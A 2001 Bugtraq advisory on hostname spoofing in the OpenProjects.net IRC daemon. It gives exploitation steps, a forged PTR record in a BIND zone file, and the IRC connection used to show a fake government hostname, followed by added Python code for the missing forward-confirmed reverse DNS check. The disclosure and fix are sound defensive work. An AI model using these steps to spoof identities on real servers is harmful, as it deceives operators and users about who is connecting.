OpenProjects IRCD allows DNS spoofing

From: Jukka Mutex (jmutex@Aphex.NewGold.NET)
Date: 10/09/01


Date: Tue, 9 Oct 2001 18:45:19 GMT
From: Jukka Mutex <jmutex@Aphex.NewGold.NET>
Message-Id: <200110091845.f99IjJN74537@Aphex.NewGold.NET>
To: bugtraq@securityfocus.com
Subject: OpenProjects IRCD allows DNS spoofing


* OpenProjects.NET IRCD DNS Spoofing *

OpenProjects.net's ircd has some truly braindead code re DNS lookups
and doesn't do a proper double-reverse paranoid lookup. In fact, it
is possible to spoof any hostname that actually exists on the internet.

Here is how to exploit it.

1. Choose a Hostname to Spoof.
It is important to keep in mind that you must choose a hostname that
actually exists. For our example, we will use 'gary7.nsa.gov'.

2. Point Your Reverse Lookup To The Hostname.
For our example, we will put the following in our BIND zonefile:
        47.222.42.209.in-addr.arpa. IN PTR gary7.nsa.gov.

Where we will assume you are using the same IP I used, 209.42.222.47.

3. Connect To A Vulnerable IRC Server.
BitchX -H 209.42.222.47 jmutex asimov.openprojects.net

Try a WHOIS on yourself.

/whois jmutex
| jmutex (jmutex@gary7.nsa.gov) (Government)
| ircname : Jukka Mutex
| server : asimov.openprojects.net (Fremont, CA)
: idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)

Credits: jmutex@newgold.net, chrisj@newgold.net, lilo
Found by: Joseph Mallett
Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
Rumored to Affect: Hybrid

Copyright (c) 2001 Joseph Mallett. All rights reserved.
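
The double-reverse ("paranoid") lookup that the post says the ircd skips, shown as an added example rather than code from the post or from the ircd: a PTR name is accepted only when that name's forward records contain the connecting IP, and the bare IP is displayed otherwise. The function names, the in-memory DNS tables and the forward addresses are constructed for illustration; only the PTR record for 209.42.222.47 is taken from the post.

```python
import ipaddress
import socket


def _system_ptr(ip):
    """Reverse lookup via the system resolver; returns a list of names."""
    try:
        name, aliases, _ = socket.gethostbyaddr(ip)
    except OSError:
        return []
    return [name] + aliases


def _system_addrs(name):
    """Forward lookup (A/AAAA) via the system resolver."""
    try:
        infos = socket.getaddrinfo(name, None)
    except OSError:
        return []
    return [info[4][0] for info in infos]


def verified_hostname(ip, ptr_lookup=_system_ptr, addr_lookup=_system_addrs):
    """Return a PTR name only if it resolves back to `ip`; else the bare IP."""
    client = ipaddress.ip_address(ip)
    for name in ptr_lookup(ip):
        name = name.rstrip(".").lower()
        for addr in addr_lookup(name):
            try:
                if ipaddress.ip_address(addr) == client:
                    return name  # forward record confirms the PTR claim
            except ValueError:
                continue  # malformed answer: ignore it
    return str(client)  # unconfirmed PTR: never show the claimed name


# Constructed in-memory DNS data. The first PTR record is the one from the
# post; the forward addresses are assumed documentation-range placeholders.
PTR = {"209.42.222.47": ["gary7.nsa.gov."], "192.0.2.10": ["irc.example.org."]}
FWD = {"gary7.nsa.gov": ["192.0.2.99"], "irc.example.org": ["192.0.2.10"]}


def demo(ip):
    return verified_hostname(ip, lambda i: PTR.get(i, []), lambda n: FWD.get(n, []))


if __name__ == "__main__":
    for ip in ("209.42.222.47", "192.0.2.10"):
        print(ip, "->", demo(ip))
```

Called without the two lookup arguments, `verified_hostname` uses the system resolver instead of the constructed tables.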


